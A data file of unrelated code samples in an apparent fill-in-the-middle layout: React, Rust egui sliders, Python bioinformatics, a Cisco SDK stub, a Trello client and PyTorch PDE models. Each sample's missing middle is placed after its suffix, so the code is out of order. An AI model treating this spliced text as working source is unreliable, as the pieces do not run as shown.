className="d-inline-block mr-2 mb-2"
to={reverse(ROUTES.AUTHOR_PAGE, { authorId: author.id })}
key={`author${author.id}`}
>
<Badge color="light">
<Icon icon={faUser} className="text-primary" /> {author.label}
</Badge>
</Link>
);
} else {
return (
<Badge key={`author${author.id}`} color="light" className="mr-2 mb-2">
<Icon icon={faUser} /> {author.label}
</Badge>
);
}
})}
</div>
)}
</div>
</div>
{!isHovering && <div style={{ width: windowWidth - 20 + 'px', height: windowHeight - 50 + 'px' }} />}
</div>
}
>
<VisualizationCard
onClick={() => {
selfVisModel.applyReconstructionModel(props.input.reconstructionModel);
props.expandVisualization(true);
}}
isHovered={isHovering}
id={`#Vis${props.input.reconstructionModel.orkgOrigin}`}
>
<div style={{ padding: '5px', pointerEvents: 'none', minWidth: '200px', minHeight: '100px' }}>
{renderingData && (
<Chart
chartType={visMethod}
data={renderingData}
width="200px"
height="100px"
options={{
width: '100%',
chartArea: { height: '50%' },
showRowNumber: true,
hAxis: {
title: visMethod === 'BarChart' ? customizationState.yAxisLabel : customizationState.xAxisLabel
},
vAxis: {
title: visMethod === 'BarChart' ? customizationState.xAxisLabel : customizationState.yAxisLabel
}
}}
/>
)}
</div>
</VisualizationCard>
</Tippy>
);
};
SingleVisualizationComponent.propTypes = {
input: PropTypes.object,
itemIndex: PropTypes.number,
expandVisualization: PropTypes.func
};
export default SingleVisualizationComponent; | </div>
{props.input.authors && props.input.authors.length > 0 && (
<div className="mb-2"> |
sliders.rs | use egui::*;
use std::f64::INFINITY;
/// Showcase sliders
#[derive(PartialEq)]
#[cfg_attr(feature = "serde", derive(serde::Deserialize, serde::Serialize))]
#[cfg_attr(feature = "serde", serde(default))]
pub struct Sliders {
pub min: f64,
pub max: f64,
pub logarithmic: bool,
pub clamp_to_range: bool,
pub smart_aim: bool,
pub step: f64,
pub use_steps: bool,
pub integer: bool,
pub vertical: bool,
pub value: f64,
}
impl Default for Sliders {
fn default() -> Self {
Self {
min: 0.0,
max: 10000.0,
logarithmic: true,
clamp_to_range: false,
smart_aim: true,
step: 10.0,
use_steps: false,
integer: false,
vertical: false,
value: 10.0,
}
}
}
impl super::Demo for Sliders {
fn name(&self) -> &'static str | fn show(&mut self, ctx: &mut egui::Context, open: &mut bool) {
egui::Window::new(self.name())
.open(open)
.resizable(false)
.show(ctx, |ui| {
use super::View as _;
self.ui(ui);
});
}
}
impl super::View for Sliders {
fn ui(&mut self, ui: &mut Ui<'_>) {
let Self {
min,
max,
logarithmic,
clamp_to_range,
smart_aim,
step,
use_steps,
integer,
vertical,
value,
} = self;
ui.label("You can click a slider value to edit it with the keyboard.");
let (type_min, type_max) = if *integer {
((i32::MIN as f64), (i32::MAX as f64))
} else if *logarithmic {
(-INFINITY, INFINITY)
} else {
(-1e5, 1e5) // linear sliders make little sense with huge numbers
};
*min = min.clamp(type_min, type_max);
*max = max.clamp(type_min, type_max);
let orientation = if *vertical {
SliderOrientation::Vertical
} else {
SliderOrientation::Horizontal
};
let istep = if *use_steps { *step } else { 0.0 };
if *integer {
let mut value_i32 = *value as i32;
ui.add(
Slider::new(&mut value_i32, (*min as i32)..=(*max as i32))
.logarithmic(*logarithmic)
.clamp_to_range(*clamp_to_range)
.smart_aim(*smart_aim)
.orientation(orientation)
.text("i32 demo slider")
.step_by(istep),
);
*value = value_i32 as f64;
} else {
ui.add(
Slider::new(value, (*min)..=(*max))
.logarithmic(*logarithmic)
.clamp_to_range(*clamp_to_range)
.smart_aim(*smart_aim)
.orientation(orientation)
.text("f64 demo slider")
.step_by(istep),
);
ui.label(
"Sliders will intelligently pick how many decimals to show. \
You can always see the full precision value by hovering the value.",
);
if ui.button("Assign PI").clicked() {
self.value = std::f64::consts::PI;
}
}
ui.separator();
ui.label("Slider range:");
ui.add(
Slider::new(min, type_min..=type_max)
.logarithmic(true)
.smart_aim(*smart_aim)
.text("left"),
);
ui.add(
Slider::new(max, type_min..=type_max)
.logarithmic(true)
.smart_aim(*smart_aim)
.text("right"),
);
ui.separator();
ui.checkbox(use_steps, "Use steps");
ui.label("When enabled, the minimal value change would be restricted to a given step.");
if *use_steps {
ui.add(egui::DragValue::new(step).speed(1.0));
}
ui.separator();
ui.horizontal(|ui| {
ui.label("Slider type:");
ui.radio_value(integer, true, "i32");
ui.radio_value(integer, false, "f64");
})
.response
.on_hover_text(ui.ctx, "All numeric types (f32, usize, …) are supported.");
ui.horizontal(|ui| {
ui.label("Slider orientation:");
ui.radio_value(vertical, false, "Horizontal");
ui.radio_value(vertical, true, "Vertical");
});
ui.add_space(8.0);
ui.checkbox(logarithmic, "Logarithmic");
ui.label("Logarithmic sliders are great for when you want to span a huge range, i.e. from zero to a million.");
ui.label("Logarithmic sliders can include infinity and zero.");
ui.add_space(8.0);
ui.checkbox(clamp_to_range, "Clamp to range");
ui.label("If true, the slider will clamp incoming and outgoing values to the given range.");
ui.label("If false, the slider can shows values outside its range, and you can manually enter values outside the range.");
ui.add_space(8.0);
ui.checkbox(smart_aim, "Smart Aim");
ui.label("Smart Aim will guide you towards round values when you drag the slider so you you are more likely to hit 250 than 247.23");
ui.add_space(8.0);
ui.vertical_centered(|ui| {
egui::reset_button(ui, self);
ui.add(crate::egui_github_link_file!());
});
}
}
| {
"⬌ Sliders"
}
|
exp_len.py | #!/usr/bin/python
import sys
import os
if len(sys.argv) >= 3 :
filename = sys.argv[1]
refFlat_filename = sys.argv[2]
else:
print("usage: python exp_len.py refSeq_MLE_output.tab known.gpd")
print("or ./exp_len.py refSeq_MLE_output.tab known.gpd")
sys.exit(1)
################################################################################
file = open(filename,'r')
row_i = 3
dt = {}
for line in file:
ls=line.strip().split('\t')
dt[ ls[0] ] = ls[1]
file.close()
################################################################################
used_set=set()
ref=open(refFlat_filename,'r')
len_dt={}
for refline in ref:
refline_list=refline.strip().split()
exon_start_list=refline_list[9].strip(',').split(',')
exon_end_list=refline_list[10].strip(',').split(',')
L = 0
i=0
for start in exon_start_list:
start =int(start)
end = int(exon_end_list[i])
L += (end - start)
i += 1
if refline_list[1] in used_set:
continue
else:
|
if dt.has_key(refline_list[1]):
print refline_list[0] + "\t" + refline_list[1] + "\t" + str(L) + "\t" + str(dt[refline_list[1]])
else:
print refline_list[0] + "\t" + refline_list[1] + "\t" + str(L) + "\t" + "0"
################################################################################
| used_set.add(refline_list[1]) |
asd.py | from ciscosupportsdk.apisession import ApiSession
SERVICE_BASE_URL = "/software/v4.0"
class AutomatedSoftwareDistributionApi(object):
"""
Cisco Automated Software Distribution service provides software
information and download URLs to assist you in upgrading your
device/application to the latest version.
"""
def __init__(self, session: ApiSession) -> None:
self._session = session
def get_bug_details(self, bug_ids: list[str]) -> None:
| """
Returns detailed information for the specified bug ID or IDs.
:param: bug_ids: list[str]: Identifier of the bug or bugs for which
to return detailed information. A maximum of five (5) bug IDs can
be submitted separated by a comma.
:rtype: Bug
"""
path = f"{SERVICE_BASE_URL}/bug_ids/" f"{','.join(bug_ids)}"
print(path)
pass |
|
Trello.js | const axios = require('axios');
const {Datastore} = require('@google-cloud/datastore');
const Slack = require('./Slack');
const datastore = new Datastore();
const config = {
"list": {
"incoming": "",
"approved": "",
"rejected": ""
},
"key": process.env.TRELLO_KEY,
"token": process.env.TRELLO_TOKEN,
"board": process.env.TRELLO_BOARD
};
class | {
constructor() {
this.board = config.board;
this.lists = {};
this.cfields = {};
this.authParams = `?key=${config.key}&token=${config.token}`;
}
async init() {
await this.initLists();
await this.initFields();
}
async initLists() {
try {
const res = await axios.get(`https://api.trello.com/1/boards/${this.board}/lists${this.authParams}`);
res.data.forEach(obj => {
this.lists[obj.name.toLowerCase()] = obj.id;
});
} catch (err) {
console.error(`[E] Couldn't get lists from Trello: ${err.message}`);
}
}
async initFields() {
try {
const res = await axios.get(`https://api.trello.com/1/boards/${this.board}/customFields${this.authParams}`);
res.data.forEach(obj => {
this.cfields[obj.name.toLowerCase().replace(/\s.*/, '')] = obj.id;
});
} catch (err) {
console.error(`[E] Couldn't get custom fields from Trello: ${err.message}`);
}
}
async newCard(formFields) {
const reqUri = `https://api.trello.com/1/cards${this.authParams}&pos=bottom&idList=${this.lists.incoming}`;
try {
const dataStoreEntity = this.formFieldsDataStoreEntity(formFields);
console.log(`[D] Store into data store ${JSON.stringify(dataStoreEntity)}`);
await this.storeEntity(dataStoreEntity);
const res = await axios.post(reqUri, this.formFieldsTrelloCardData(formFields));
dataStoreEntity.data.trelloId = res.data.id;
await this.storeEntity(dataStoreEntity);
this.addFields(res.data.id, formFields);
const slack = new Slack();
await slack.newMessage(formFields.name, res.data.shortUrl);
} catch (err) {
console.error(`[E] Error while creating Trello card: ${err.message} (${reqUri})`);
return err;
}
}
async addFields(cardId, formFields) {
const formCustomFields = {...formFields};
delete formCustomFields.request;
const requests = [];
Object.keys(formCustomFields).forEach(fieldName => {
if (formCustomFields[fieldName] === '') {
return;
}
const fieldId = this.cfields[fieldName];
const value = {
"value": {
"text": formCustomFields[fieldName]
},
"key": config.key,
"token": config.token
};
requests.push([`https://api.trello.com/1/card/${cardId}/customField/${fieldId}/item`, value, fieldName]);
});
for (const req of requests) {
const uri = req[0];
const data = req[1];
const fieldName = req[2];
try {
await axios.put(uri, data);
} catch (err) {
console.error(`[E] Failed to update custom field "${fieldName}" on card ${cardId}: ${err.message}`);
}
}
}
formFieldsDataStoreEntity(formFields) {
const key = datastore.key('request');
return {
key: key,
data: {
request: formFields,
createdOn: new Date().toUTCString(),
region: formFields.location,
trelloId: null
}
};
}
formFieldsTrelloCardData(formFields) {
const maxContentLen = 160;
const requestContent = formFields.request
.replace(/(?:\r\n|\r|\n)/g, '; ');
return {
name: requestContent.length > maxContentLen
? requestContent.substring(0, maxContentLen - 3) + '...'
: requestContent,
desc: requestContent
};
}
async storeEntity(requestEntity) {
return datastore.save(requestEntity, (err, apiResponse) => {
if (err) {
console.error(`[E] Error while storing into data store: ${err.message} [${JSON.stringify(requestEntity)}]`);
}
});
}
}
module.exports = Trello;
| Trello |
classpath_util.py | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import itertools
import os
from collections import OrderedDict
from twitter.common.collections import OrderedSet
from pants.util.contextutil import open_zip
from pants.util.dirutil import fast_relpath, safe_walk
from pants.util.strutil import ensure_text
class ClasspathUtil(object):
@classmethod
def compute_classpath(cls, targets, classpath_products, extra_classpath_tuples, confs):
"""Return the list of classpath entries for a classpath covering the passed targets.
Filters and adds paths from extra_classpath_tuples to the end of the resulting list.
:param targets: The targets to generate a classpath for.
:param ClasspathProducts classpath_products: Product containing classpath elements.
:param extra_classpath_tuples: Additional classpath entries.
:param confs: The list of confs for use by this classpath.
:returns: The classpath as a list of path elements.
:rtype: list of string
"""
classpath_iter = cls._classpath_iter(targets, classpath_products, confs=confs)
total_classpath = OrderedSet(classpath_iter)
filtered_extra_classpath_iter = cls._filtered_classpath_by_confs_iter(extra_classpath_tuples,
confs)
extra_classpath_iter = cls._entries_iter(filtered_extra_classpath_iter)
total_classpath.update(extra_classpath_iter)
return list(total_classpath)
@classmethod
def classpath(cls, targets, classpath_products, confs=('default',)):
"""Return the classpath as a list of paths covering all the passed targets.
:param targets: Targets to build an aggregated classpath for.
:param ClasspathProducts classpath_products: Product containing classpath elements.
:param confs: The list of confs for use by this classpath.
:returns: The classpath as a list of path elements.
:rtype: list of string
"""
classpath_iter = cls._classpath_iter(targets, classpath_products, confs=confs)
return list(classpath_iter)
@classmethod
def _classpath_iter(cls, targets, classpath_products, confs=('default',)):
classpath_tuples = classpath_products.get_for_targets(targets)
filtered_tuples_iter = cls._filtered_classpath_by_confs_iter(classpath_tuples, confs)
return cls._entries_iter(filtered_tuples_iter)
@classmethod
def internal_classpath(cls, targets, classpath_products, confs=('default',)):
"""Return the list of internal classpath entries for a classpath covering all `targets`.
Any classpath entries contributed by external dependencies will be omitted.
:param targets: Targets to build an aggregated classpath for.
:param ClasspathProducts classpath_products: Product containing classpath elements.
:param confs: The list of confs for use by this classpath.
:returns: The classpath as a list of path elements.
:rtype: list of string
"""
classpath_tuples = classpath_products.get_internal_classpath_entries_for_targets(targets)
filtered_tuples_iter = cls._filtered_classpath_by_confs_iter(classpath_tuples, confs)
return [entry.path for entry in cls._entries_iter(filtered_tuples_iter)]
@classmethod
def classpath_by_targets(cls, targets, classpath_products, confs=('default',)):
"""Return classpath entries grouped by their targets for the given `targets`.
:param targets: The targets to lookup classpath products for.
:param ClasspathProducts classpath_products: Product containing classpath elements.
:param confs: The list of confs for use by this classpath.
:returns: The ordered (target, classpath) mappings.
:rtype: OrderedDict
"""
classpath_target_tuples = classpath_products.get_product_target_mappings_for_targets(targets)
filtered_items_iter = itertools.ifilter(cls._accept_conf_filter(confs, lambda x: x[0][0]),
classpath_target_tuples)
# group (classpath_entry, target) tuples by targets
target_to_classpath = OrderedDict()
for classpath_entry, target in filtered_items_iter:
_, entry = classpath_entry
if not target in target_to_classpath:
target_to_classpath[target] = []
target_to_classpath[target].append(entry)
return target_to_classpath
@classmethod
def _accept_conf_filter(cls, confs, unpack_func=None):
def accept_conf_in_item(item):
conf = unpack_func(item)
return confs is None or conf in confs
unpack_func = unpack_func or (lambda x: x)
return accept_conf_in_item
@classmethod
def _filtered_classpath_by_confs_iter(cls, classpath_tuples, confs):
|
@classmethod
def _entries_iter(cls, classpath):
for conf, entry in classpath:
yield entry
@classmethod
def classpath_contents(cls, targets, classpath_products, confs=('default',)):
"""Provide a generator over the contents (classes/resources) of a classpath.
:param targets: Targets to iterate the contents classpath for.
:param ClasspathProducts classpath_products: Product containing classpath elements.
:param confs: The list of confs for use by this classpath.
:returns: An iterator over all classpath contents, one directory, class or resource relative
path per iteration step.
:rtype: :class:`collections.Iterator` of string
"""
classpath_iter = cls._classpath_iter(targets, classpath_products, confs=confs)
for f in cls.classpath_entries_contents(classpath_iter):
yield f
@classmethod
def classpath_entries_contents(cls, classpath_entries):
"""Provide a generator over the contents (classes/resources) of a classpath.
Subdirectories are included and differentiated via a trailing forward slash (for symmetry
across ZipFile.namelist and directory walks).
:param classpath_entries: A sequence of classpath_entries. Non-jars/dirs are ignored.
:returns: An iterator over all classpath contents, one directory, class or resource relative
path per iteration step.
:rtype: :class:`collections.Iterator` of string
"""
for entry in classpath_entries:
if cls.is_jar(entry):
# Walk the jar namelist.
with open_zip(entry, mode='r') as jar:
for name in jar.namelist():
yield ensure_text(name)
elif os.path.isdir(entry):
# Walk the directory, including subdirs.
def rel_walk_name(abs_sub_dir, name):
return fast_relpath(os.path.join(abs_sub_dir, name), entry)
for abs_sub_dir, dirnames, filenames in safe_walk(entry):
for name in dirnames:
yield '{}/'.format(rel_walk_name(abs_sub_dir, name))
for name in filenames:
yield rel_walk_name(abs_sub_dir, name)
else:
# non-jar and non-directory classpath entries should be ignored
pass
@classmethod
def classname_for_rel_classfile(cls, class_file_name):
"""Return the class name for the given relative-to-a-classpath-entry file, or None."""
if not class_file_name.endswith('.class'):
return None
return class_file_name[:-len('.class')].replace('/', '.')
@classmethod
def is_jar(cls, path):
"""True if the given path represents an existing jar or zip file."""
return path.endswith(('.jar', '.zip')) and os.path.isfile(path)
@classmethod
def is_dir(cls, path):
"""True if the given path represents an existing directory."""
return os.path.isdir(path)
| filter_func = cls._accept_conf_filter(confs, unpack_func=lambda x: x[0])
return itertools.ifilter(filter_func, classpath_tuples) |
forward_models.py | """
Package defining various dynamic forward models as well as convenience methods to generate the
right hand sides (RHS) of the related partial differential equations.
Currently, the following forward models are implemented:
#. An advection equation for images
#. An advection equation for maps
#. The EPDiff-equation parameterized using the vector-valued momentum for images
#. The EPDiff-equation parameterized using the vector-valued momentum for maps
#. The EPDiff-equation parameterized using the scalar-valued momentum for images
#. The EPDiff-equation parameterized using the scalar-valued momentum for maps
The images are expected to be tensors of dimension: BxCxXxYxZ (or BxCxX in 1D and BxCxXxY in 2D),
where B is the batch-size, C the number of channels, and X, Y, and Z are the spatial coordinate indices.
Futhermore the following (RHSs) are provided
#. Image advection
#. Map advection
#. Scalar conservation law
#. EPDiff
"""
from __future__ import print_function
from __future__ import absolute_import
from builtins import range
from builtins import object
from abc import ABCMeta, abstractmethod
import numpy as np
from . import finite_differences_multi_channel as fdm
from . import utils
from .data_wrapper import MyTensor
from future.utils import with_metaclass
import torch.nn as nn
import torch
class RHSLibrary(object):
"""
Convenience class to quickly generate various right hand sides (RHSs) of popular partial differential
equations. In this way new forward models can be written with minimal code duplication.
"""
def __init__(self, spacing, use_neumann_BC_for_map=False):
"""
Constructor
:param spacing: Spacing for the images. This will be an array with 1, 2, or 3 entries in 1D, 2D, and 3D respectively.
"""
self.spacing = spacing
"""spatial spacing"""
self.spacing_min = np.min(spacing)
""" min of the spacing"""
self.spacing_ratio = spacing/self.spacing_min
self.fdt_ne = fdm.FD_torch_multi_channel(spacing,mode='neumann_zero')
"""torch finite differencing support neumann zero"""
self.fdt_le = fdm.FD_torch_multi_channel( spacing, mode='linear')
"""torch finite differencing support linear extrapolation"""
self.fdt_di = fdm.FD_torch_multi_channel(spacing, mode='dirichlet_zero')
"""torch finite differencing support dirichlet zero"""
self.dim = len(self.spacing)
"""spatial dimension"""
self.use_neumann_BC_for_map = use_neumann_BC_for_map
"""If True uses zero Neumann boundary conditions also for evolutions of the map, if False uses linear extrapolation"""
def rhs_advect_image_multiNC(self,I,v):
'''
Advects a batch of images which can be multi-channel. Expected image format here, is
BxCxXxYxZ, where B is the number of images (batch size), C, the number of channels
per image and X, Y, Z are the spatial coordinates (X only in 1D; X,Y only in 2D)
:math:`-\\nabla I^Tv`
:param I: Image batch BxCIxXxYxZ
:param v: Velocity fields (this will be one velocity field per image) BxCxXxYxZ
:return: Returns the RHS of the advection equations involved BxCxXxYxZ
'''
rhs_ret= self._rhs_advect_image_multiN(I, v )
return rhs_ret
def _rhs_advect_image_multiN(self,I,v):
"""
:param I: One-channel input image: Bx1xXxYxZ
:param v: velocity field BxCxXxYxZ
:return: Returns the RHS of the advection equation for one channel BxXxYxZ
"""
if self.dim == 1:
rhs_ret = -self.fdt_ne.dXc(I) * v[:,0:1]
elif self.dim == 2:
rhs_ret = -self.fdt_ne.dXc(I) * v[:,0:1] -self.fdt_ne.dYc(I)*v[:,1:2]
elif self.dim == 3:
rhs_ret = -self.fdt_ne.dXc(I) * v[:,0:1] -self.fdt_ne.dYc(I)*v[:,1:2]-self.fdt_ne.dZc(I)*v[:,2:3]
else:
raise ValueError('Only supported up to dimension 3')
return rhs_ret
def rhs_scalar_conservation_multiNC(self, I, v):
"""
Scalar conservation law for a batch of images which can be multi-channel. Expected image format here, is
BxCxXxYxZ, where B is the number of images (batch size), C, the number of channels
per image and X, Y, Z are the spatial coordinates (X only in 1D; X,Y only in 2D)
:math:`-div(Iv)`
:param I: Image batch BxCIxXxYxZ
:param v: Velocity fields (this will be one velocity field per image) BxCxXxYxZ
:return: Returns the RHS of the scalar conservation law equations involved BxCxXxYxZ
"""
rhs_ret=self._rhs_scalar_conservation_multiN(I, v)
return rhs_ret
def _rhs_scalar_conservation_multiN(self, I, v):
"""
:param I: One-channel input image: Bx1xXxYxZ
:param v: velocity field BxCxXxYxZ
:return: Returns the RHS of the scalar-conservation law equation for one channel BxXxYxZ
"""
if self.dim==1:
rhs_ret = -self.fdt_ne.dXc(I*v[:,0:1])
elif self.dim==2:
rhs_ret = -self.fdt_ne.dXc(I*v[:,0:1]) -self.fdt_ne.dYc(I*v[:,1:2])
elif self.dim==3:
rhs_ret = -self.fdt_ne.dXc(I* v[:,0:1]) -self.fdt_ne.dYc(I*v[:,1:2])-self.fdt_ne.dZc(I*v[:,2:3])
else:
raise ValueError('Only supported up to dimension 3')
return rhs_ret
def rhs_lagrangian_evolve_map_multiNC(self, phi, v):
"""
Evolves a set of N maps (for N images). Expected format here, is
BxCxXxYxZ, where B is the number of images/maps (batch size), C, the number of channels
per (here the spatial dimension for the map coordinate functions),
and X, Y, Z are the spatial coordinates (X only in 1D; X,Y only in 2D).
This is used to evolve the map going from source to target image. Requires interpolation
so should if at all possible not be used as part of an optimization.
the idea of compute inverse map is due to the map is defined
in the source space, referring to point move to where,(compared with the target space, refers to where it comes from)
in this situation, we only need to capture the velocity at that place and accumulate along the time step
since advecton function is moves the image (or phi based image) by v step, which means v is shared by different coordinate,
so it is safe to compute in this way.
:math:`v\circ\phi`
:param phi: map batch BxCxXxYxZ
:param v: Velocity fields (this will be one velocity field per map) BxCxXxYxZ
:return: Returns the RHS of the evolution equations involved BxCxXxYxZ
:param phi:
:param v:
:return:
"""
rhs_ret = utils.compute_warped_image_multiNC(v, phi, spacing=self.spacing, spline_order=1,zero_boundary=False)
return rhs_ret
def rhs_advect_map_multiNC(self, phi, v):
'''
Advects a set of N maps (for N images). Expected format here, is
BxCxXxYxZ, where B is the number of images/maps (batch size), C, the number of channels
per (here the spatial dimension for the map coordinate functions),
and X, Y, Z are the spatial coordinates (X only in 1D; X,Y only in 2D)
:math:`-D\\phi v`
:param phi: map batch BxCxXxYxZ
:param v: Velocity fields (this will be one velocity field per map) BxCxXxYxZ
:return: Returns the RHS of the advection equations involved BxCxXxYxZ
'''
sz = phi.size()
rhs_ret = self._rhs_advect_map_call(phi, v)
return rhs_ret
def _rhs_advect_map_call(self,phi,v):
"""
:param phi: map batch BxCxXxYxZ
:param v: Velocity fields (this will be one velocity field per map) BxCxXxYxZ
:return rhsphi: Returns the RHS of the advection equations involved BxCxXxYxZ
"""
fdc = self.fdt_le # use order boundary conditions (interpolation)
if self.dim==1:
dxc_phi = -fdc.dXc(phi)
rhsphi = v[:, 0:1] * dxc_phi
elif self.dim==2:
dxc_phi = -fdc.dXc(phi)
dyc_phi = -fdc.dYc(phi)
rhsphi = v[:, 0:1] * dxc_phi + v[:, 1:2] * dyc_phi
elif self.dim==3:
dxc_phi = -fdc.dXc(phi)
dyc_phi = -fdc.dYc(phi)
dzc_phi = -fdc.dZc(phi)
rhsphi = v[:,0:1]*dxc_phi + v[:,1:2]*dyc_phi + v[:,2:3]*dzc_phi
else:
raise ValueError('Only supported up to dimension 3')
return rhsphi
def rhs_epdiff_multiNC(self, m, v):
'''
Computes the right hand side of the EPDiff equation for of N momenta (for N images).
Expected format here, is BxCxXxYxZ, where B is the number of momenta (batch size), C,
the number of channels per (here the spatial dimension for the momenta),
and X, Y, Z are the spatial coordinates (X only in 1D; X,Y only in 2D)
a new version, where batch is no longer calculated separately
:math:`-(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:param m: momenta batch BxCXxYxZ
:param v: Velocity fields (this will be one velocity field per momentum) BxCXxYxZ
:return: Returns the RHS of the EPDiff equations involved BxCXxYxZ
'''
sz = m.size()
rhs_ret = MyTensor(sz).zero_()
rhs_ret = self._rhs_epdiff_call(m, v, rhs_ret)
return rhs_ret
def _rhs_epdiff_call(self, m, v,rhsm):
"""
:param m: momenta batch BxCxXxYxZ
:param v: Velocity fields (this will be one velocity field per momentum) BxCxXxYxZ
:return rhsm: Returns the RHS of the EPDiff equations involved BxCxXxYxZ
"""
# if self.use_neumann_BC_for_map:
# fdc = self.fdt_ne # use zero Neumann boundary conditions
# else:
# fdc = self.fdt_le # do linear extrapolation
fdc = self.fdt_ne
#fdc = self.fdt_le
if self.dim == 1:
dxc_mv0 = -fdc.dXc(m*v[:,0:1])
dxc_v = -fdc.dXc(v)
dxc_v_multi_m = dxc_v * m
rhsm[:]= dxc_mv0 + dxc_v_multi_m
elif self.dim == 2:
# (m_1,...,m_d)^T_t = -(div(m_1v),...,div(m_dv))^T-(Dv)^Tm (EPDiff equation)
dxc_mv0 = -fdc.dXc(m*v[:,0:1])
dyc_mv1 = -fdc.dYc(m*v[:,1:2])
dc_mv_sum = dxc_mv0 + dyc_mv1
dxc_v = -fdc.dXc(v)
dyc_v = -fdc.dYc(v)
dxc_v_multi_m = dxc_v * m
dyc_v_multi_m = dyc_v * m
dxc_v_multi_m_sum = torch.sum(dxc_v_multi_m, 1)
dyc_v_multi_m_sum = torch.sum(dyc_v_multi_m, 1)
rhsm[:,0, :, :] = dc_mv_sum[:,0] + dxc_v_multi_m_sum
rhsm[:,1, :, :] = dc_mv_sum[:,1] + dyc_v_multi_m_sum
elif self.dim == 3:
dxc_mv0 = -fdc.dXc(m*v[:,0:1])
dyc_mv1 = -fdc.dYc(m*v[:,1:2])
dzc_mv2 = -fdc.dZc(m*v[:,2:3])
dc_mv_sum = dxc_mv0 + dyc_mv1 + dzc_mv2
dxc_v = -fdc.dXc(v)
dyc_v = -fdc.dYc(v)
dzc_v = -fdc.dZc(v)
dxc_v_multi_m = dxc_v*m
dyc_v_multi_m = dyc_v*m
dzc_v_multi_m = dzc_v*m
dxc_v_multi_m_sum = torch.sum(dxc_v_multi_m,1)
dyc_v_multi_m_sum = torch.sum(dyc_v_multi_m,1)
dzc_v_multi_m_sum = torch.sum(dzc_v_multi_m,1)
rhsm[:, 0] = dc_mv_sum[:,0] + dxc_v_multi_m_sum
rhsm[:, 1] = dc_mv_sum[:,1] + dyc_v_multi_m_sum
rhsm[:, 2] = dc_mv_sum[:,2] + dzc_v_multi_m_sum
else:
raise ValueError('Only supported up to dimension ')
return rhsm
def rhs_adapt_epdiff_wkw_multiNC(self, m, v,w, sm_wm,smoother):
'''
Computes the right hand side of the EPDiff equation for of N momenta (for N images).
Expected format here, is BxCxXxYxZ, where B is the number of momenta (batch size), C,
the number of channels per (here the spatial dimension for the momenta),
and X, Y, Z are the spatial coordinates (X only in 1D; X,Y only in 2D)
a new version, where batch is no longer calculated separately
:math:`-(div(m_1v),...,div(m_dv))^T-(Dv)^Tm`
:param m: momenta batch BxCXxYxZ
:param v: Velocity fields (this will be one velocity field per momentum) BxCXxYxZ
:return: Returns the RHS of the EPDiff equations involved BxCXxYxZ
'''
sz = m.size()
rhs_ret = MyTensor(sz).zero_()
rhs_ret = self._rhs_adapt_epdiff_wkw_call(m, v,w,sm_wm,smoother, rhs_ret)
return rhs_ret
def _rhs_adapt_epdiff_wkw_call(self, m, v,w,sm_wm, smoother, rhsm):
"""
:param m: momenta batch BxCxXxYxZ
:param sm_wm: smoothed(wm) batch x K x dim x X x Y x ...
:param w: smoothed(wm) batch x K x X x Y x ...
:param v: Velocity fields (this will be one velocity field per momentum) BxCxXxYxZ
:return rhsm: Returns the RHS of the EPDiff equations involved BxCxXxYxZ
"""
# if self.use_neumann_BC_for_map:
# fdc = self.fdt_ne # use zero Neumann boundary conditions
# else:
# fdc = self.fdt_le # do linear extrapolation
fdc = self.fdt_ne
rhs = self._rhs_epdiff_call(m,v,rhsm)
ret_var = torch.empty_like(rhs)
# ret_var, rhs should batch x dim x X x Yx ..
dim = m.shape[1]
sz = [m.shape[0]]+[1]+list(m.shape[1:]) # batchx1xdimx X x Y
m = m.view(*sz)
m_sm_wm = m* sm_wm
m_sm_wm = m_sm_wm.sum(dim=2)
sm_m_sm_wm = smoother.smooth(m_sm_wm) # batchx K x X xY...
dxc_w = fdc.dXc(w)
dc_w_list = [dxc_w]
if dim == 2 or dim == 3:
dyc_w = fdc.dYc(w)
dc_w_list.append(dyc_w)
if dim == 3:
dzc_w = fdc.dZc(w) # batch x K x X xY ...
dc_w_list.append(dzc_w)
for i in range(dim):
ret_var[:, i] = rhs[:, i] + (sm_m_sm_wm* dc_w_list[i]).sum(1)
return ret_var
class ForwardModel(with_metaclass(ABCMeta, object)):
"""
Abstract forward model class. Should never be instantiated.
Derived classes require the definition of f(self,t,x,u,pars) and u(self,t,pars).
These functions will be used for integration: x'(t) = f(t,x(t),u(t))
"""
def __init__(self, sz, spacing, params=None):
'''
Constructor of abstract forward model class
:param sz: size of images
:param spacing: numpy array for spacing in x,y,z directions
'''
self.dim = spacing.size # spatial dimension of the problem
"""spatial dimension"""
self.spacing = spacing
"""spatial spacing"""
self.sz = sz
"""image size (BxCxXxYxZ)"""
self.params = params
"""ParameterDict instance holding parameters"""
self.rhs = RHSLibrary(self.spacing)
"""rhs library support"""
if self.dim>3 or self.dim<1:
raise ValueError('Forward models are currently only supported in dimensions 1 to 3')
self.debug_mode_on =False
@abstractmethod
def f(self,t,x,u,pars,variables_from_optimizer=None):
"""
Function to be integrated
:param t: time
:param x: state
:param u: input
:param pars: optional parameters
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: the function value, should return a list (to support easy concatenations of states)
"""
pass
def u(self,t,pars,variables_from_optimizer=None):
"""
External input
:param t: time
:param pars: parameters
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: the external input
"""
return []
class AdvectMap(ForwardModel):
"""
Forward model to advect an n-D map using a transport equation: :math:`\\Phi_t + D\\Phi v = 0`.
v is treated as an external argument and \Phi is the state
"""
def __init__(self, sz, spacing, params=None,compute_inverse_map=False):
super(AdvectMap,self).__init__(sz,spacing,params)
self.compute_inverse_map = compute_inverse_map
"""If True then computes the inverse map on the fly for a map-based solution"""
def u(self,t, pars, variables_from_optimizer=None):
"""
External input, to hold the velocity field
:param t: time (ignored; not time-dependent)
:param pars: assumes an n-D velocity field is passed as the only input argument
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: Simply returns this velocity field
"""
return pars['v']
def f(self,t, x, u, pars=None, variables_from_optimizer=None):
"""
Function to be integrated, i.e., right hand side of transport equation:
:math:`-D\\phi v`
:param t: time (ignored; not time-dependent)
:param x: state, here the map, \Phi, itself (assumes 3D-5D array; [nrI,0,:,:] x-coors; [nrI,1,:,:] y-coors; ...
:param u: external input, will be the velocity field here
:param pars: ignored (does not expect any additional inputs)
:param variables_from_optimizer: variables that can be passed from the optimizer
:return: right hand side [phi]
"""
if self.compute_inverse_map:
